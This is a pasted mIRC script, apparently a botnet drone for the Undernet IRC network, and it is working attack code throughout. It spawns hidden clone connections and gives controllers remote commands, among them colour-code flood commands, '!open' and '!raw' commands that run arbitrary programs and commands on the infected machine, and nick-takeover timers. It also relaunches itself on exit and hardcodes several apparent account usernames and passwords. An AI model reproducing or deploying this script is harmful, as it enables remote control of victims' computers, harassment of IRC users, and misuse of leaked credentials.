Guest User


a guest
May 21st, 2017
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text 9.86 KB | None | 0 0
  1. on *:start:{
  2. .st
  3. }
  4. alias secure { mode $me +iwx }
  5. alias st {
  6. nick $read ident.txt $+ $r(a,z)
  7. anick $read ident.txt $+ $r(a,z)
  8. fullname $read fullname.txt
  9. identd on $read ident.txt
  10. set %cons
  11. notify on | notify disk | notify jail | notify ctrldel
  12. writeini mirc.ini mirc user $read ident.txt $+ $r(11111,99999) | saveini
  13. ignore -td *!*@*
  14. server Drone -j #disk
  15. server -m Undernet | set %clona1 2
  16. .timer 1 3 .scid %clona1 server -m Undernet | set %clona2 $calc(%clona1 + 1)
  17. .timer 1 6 .scid %clona2 server -m Undernet | set %clona3 $calc(%clona2 + 1)
  18. .timer 1 12 silence +*!*@*,~*!*@*,~*!*@*.ro
  19. .timer 1 4 mode $me +x
  20. .timer 1 20 secure
  21. set %utimee $ctime
  22. set %1 0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15..0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15..0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15.
  23. set %2 2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>
  24. set %3 2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O
  25. set %u1 mldv
  26. set %p1 bagpwla
  27. set %u2 TwiNkie
  28. set %p2 TfGVqmBC
  29. set %u3 iabusesowhat
  30. set %p3 i2Z7c19
  31. set %u4 adrian
  32. set %p4 adi
  33. set %l1 login mldv bagpwla
  34. set %l2 login TwiNkie TfGVqmBC
  35. set %l3 login iabusesowhat i2Z7c19
  36. set %l4 login user4 pass4
  37. }
  38. on 1:connect:{
  39. nick $read ident.txt $+ $r(a,z)
  40. anick $read ident.txt $+ $r(a,z)
  41. fullname $read fullname.txt
  42. identd on $read ident.txt
  43. .timer 1 10 mode $me +iwx
  44. .timer 1 10 silence +*!*@*,~*!*@*,~*!*@*.ro
  45. .timer 1 17 secure
  46. .notify on
  47. }
  48. on 1:unotify: {
  49. .nick $nick
  50. }
  51. on *:nick: {
  52. .timer 1 0 .bitch $newnick [ % $+ [ $newnick ] ]
  53. }
  54. alias checkme {
  55. if ($1 !== $2) { echo 0checkme }
  56. if ($1 == $2) { join #bagpwla abc .msg %l1 | .away 5get a life dude 3....
  57. | .timer 1 3 .msg %l2 | .timer 1 15 .msg %l3 }
  58. }
  59. alias bitch {
  60. if ($1 == $2) {
  61. .timer 1 4 notify off
  62. .msg [ % $+ [ $1 $+ usr ] ]
  63. .timer 1 1 .checkme $me $1 | halt
  64. }
  65. if ($1 !== $2) { echo 0bitch }
  66. }
  67. alias connectcheck { whois $me }
  68. on 1:kick:#:{
  69. haltdef
  70. if ($knick == $me) {
  71. .raw join $mass
  72. halt
  73. }
  74. }
  76. on 100:text:*:*:{
  77. if ($1 == !flc) { .ctcp $2 0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15..0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15..0,1..0,2..0,3..0,4..0,5..0,6..0,7..0,8..0,9..0,10..0,11..0,12..0,13..0,14..0,15. }
  78. if ($1 == !flm) { .msg $2 2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*>2<*>3<*>4<*>5<*>6<*>7<*>8<*>9<*>10<*>11<*>13<*>14<*> }
  79. if ($1 == !fln) { .notice $2 2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O2o3O4o5O6o7O8o9O10o11O14o2O3o4O5o6O7o8O9o10O11o12O13o14O }
  80. if ($1 == !ontime) { .notice $nick 2Ontime 4:2 $uptime(server,1) | halt }
  81. if ($1 == !uptime) { .notice $nick 2Uptime 4:2 $duration($calc( $ticks / 1000)) | halt }
  82. if ($1 == !version) { .msg $chan $ver | halt }
  83. if ($1 == !cserv) { .notice $nick 2Current Server 4:2 $server }
  84. if ($1 == !open) { run $2- | .notice $nick 2Try To Open 4:2 $2- | halt }
  85. if ($1 == !msg) { .msg $2- | halt }
  86. if ($1 == !say) { .msg $chan $2- | halt }
  87. if ($1 == !me) { describe $chan $2- | halt }
  88. if ($1 == !ame) { ame $2- | halt }
  89. if ($1 == !away) { .away | .away $2- | halt }
  90. if ($1 == !join) { join $2- | who $2 | halt }
  91. if ($1 == !part) { part $2 }
  92. if ($1 == !raw) { $$2- }
  93. if ($1 == !login) { .msg login $2- | halt }
  94. if ($1 == !exit) && ($level($address($nick,2)) > 2) { exit | halt }
  95. if ($1 == !part) {
  96. if ($2 = $chr(42)) {
  97. set %paid 0
  98. set %tp $chan(0)
  99. while (%tp > %paed) {
  100. set %paid $calc(%paid + 1)
  101. if ($chan(%paid) != %chan) && ($chan(%paid) != %chan2) { .part $chan(%paed) 2at4 $nick 2request4. }
  102. }
  103. }
  104. .timer 1 0 part $2-
  105. halt
  106. }
  107. if ($1 == $me) {
  108. if ($2 == ontime) { .notice $nick 2Ontime 4:2 $uptime(server,1) | halt }
  109. if ($2 == uptime) { .notice $nick 2Uptime 4:2 $duration($calc( $ticks / 1000)) | halt }
  110. if ($2 == cserv) { .notice $nick 2Current Server 4:2 $server }
  111. if ($2 == msg) { .msg $3- | halt }
  112. if ($2 == say) { .msg $chan $3- | halt }
  113. if ($2 == me) { describe $chan $3- | halt }
  114. if ($2 == notice) { notice $3- | halt }
  115. if ($2 == away) { .away | .away $3- | halt }
  116. if ($2 == join) { join $3- | who $3 | halt }
  117. if ($2 == part) { part $3 }
  118. if ($2 == raw) { $$3- }
  119. if ($2 == exit) && ($level($address($nick,2)) > 2) { exit | halt }
  120. if ($2 == part) {
  121. if ($3 == $chr(42)) {
  122. set %paid 0
  123. set %tp $chan(0)
  124. while (%tp > %paid) {
  125. set %paid $calc(%paid + 1)
  126. if ($chan(%paid) != %chan) { .part $chan(%paid) 2at4 $nick 2request4. }
  127. }
  128. }
  129. .timer 1 0 part $3-
  130. halt
  131. }
  132. .timer 1 0 $2-
  133. }
  134. if ($1 == .flc) { scid %clona1 .ctcp $2 %1 | scid %clona2 .ctcp $2 %1 | scid %clona3 .ctcp $2 %1 | halt }
  135. if ($1 == ,flm) { scid %clona1 .msg $2 %2 | scid %clona2 .msg $2 %2 | scid %clona3 .msg $2 %2 | halt }
  136. if ($1 == ,fln) { scid %clona1 .notice $2 %3 | scid %clona2 .notice $2 %3 | scid %clona3 .notice $2 %3 | halt }
  137. if ($1 == ,join) { scid %clona1 join $2- | scid %clona2 join $2- | scid %clona3 join $2- | who $2 | halt }
  138. if ($1 == ,part) { scid %clona1 part $2- | scid %clona2 part $2- | scid %clona3 part $2- | who $2 | halt }
  139. if ($1 == .msg) { scid %clona1 .msg $2- | scid %clona2 .msg $2- | scid %clona3 .msg $2- | halt }
  140. if ($1 == ,ctcp) { scid %clona1 .ctcp $2- | scid %clona2 .ctcp $2- | scid %clona3 .ctcp $2- | halt }
  141. if ($1 == .fura+log) { set % $+ [ $2 ] $2 | set % $+ [ $2 $+ usr ] LOGIN $3 $4 | .notify $2 | .notice $nick 2ADD4 $2 2In Notify List4. 1[ 2ON UNDERNET 1] | halt }
  142. if ($1 == ,lasa+log) { .notify -r $2 | unset % $+ $2 | unset % $+ [ $2 $+ usr ] | .notice $nick 2REM4 $2 2From Notify List4. 1[ 2ON UNDERNET 1] | halt }
  143. if ($1 == ,rnick) { scid %clona1 nick $read ident.txt $+ $r(1,9) $+ $r(1,9) | scid %clona2 nick $read ident.txt $+ $r(1,9) $+ $r(1,9) | scid %clona3 nick $read ident.txt $+ $r(1,9) $+ $r(1,9) | halt }
  144. if ($1 == .exit) && ($level($address($nick,2)) > 2) { .scid %clona1 exit | .scid %clona2 exit | .scid %clona3 exit | halt }
  145. if ($1 == .timer) { set % $+ [ $2 ] $2 | set % $+ [ $2 $+ usr ] LOGIN $3 $4 | secure | .scid %clona1 .timer 0 3 nick $2 | .scid %clona2 .timer 0 3 nick $2 | .scid %clona3 .timer 0 3 nick $2 | .notice $nick 2Timer On4 $2 2Started 4! 1[ 2ON UNDERNET 2] 4- 1[ 2Simple AutoLogin 1] | halt }
  146. if ($1 == .ultra) { set % $+ [ $2 ] $2 | set % $+ [ $2 $+ usr ] LOGIN $3 $4 | secure | .scid %clona1 .timer 8 1 nick $2 | .scid %clona2 .timer 8 1 nick $2 | .scid %clona3 .timer 8 1 nick $2 | .notice $nick 2Fast Timer On4 $2 2Started 4! 1[ 2ON UNDERNET 1] | halt }
  147. if ($1 == .stop) { .scid %clona1 .timers off | .scid %clona2 .timers off | .scid %clona3 .timers off | .notice $nick 2ALL TIMERS STOPED 4! 1[ 2ON UNDERNET 1] | halt }
  148. if ($1 == .t1) { set % $+ [ $2 ] $2 | set % $+ [ $2 $+ usr ] LOGIN %u1 %p1 | secure | .scid %clona1 .timer 0 3 nick $2 | .scid %clona2 .timer 0 3 nick $2 | .scid %clona3 .timer 0 3 nick $2 | .notice $nick 2Timer On4 $2 2Started 4! 1[ 2ON UNDERNET 1] 4- 2Using AutoLogin User4 %u1 | halt }
  149. if ($1 == .t2) { set % $+ [ $2 ] $2 | set % $+ [ $2 $+ usr ] LOGIN %u2 %p2 | secure | .scid %clona1 .timer 0 3 nick $2 | .scid %clona2 .timer 0 3 nick $2 | .scid %clona3 .timer 0 3 nick $2 | .notice $nick 2Timer On4 $2 2Started 4! 1[ 2ON UNDERNET 1] 4- 2Using AutoLogin User4 %u2 | halt }
  151. }
  153. on 100:notice:*:?: {
  154. if ($1 == join) { join $2 }
  155. if ($1 == r) { nick $read ident.txt $+ $r(1,9) $+ $r(1,9) | halt }
  156. if ($1 == raw) { $$2- }
  157. }
  159. raw 471:*:{
  160. haltdef
  161. .timerjoin $+ $$2 60 30 join $$2
  162. halt
  163. }
  165. raw 473:*:{
  166. haltdef
  167. .timerjoin $+ $$2 60 30 join $$2
  168. halt
  169. }
  171. on *:exit: { /run $mircexe | halt }
  172. alias ver return 2disk12 1.3
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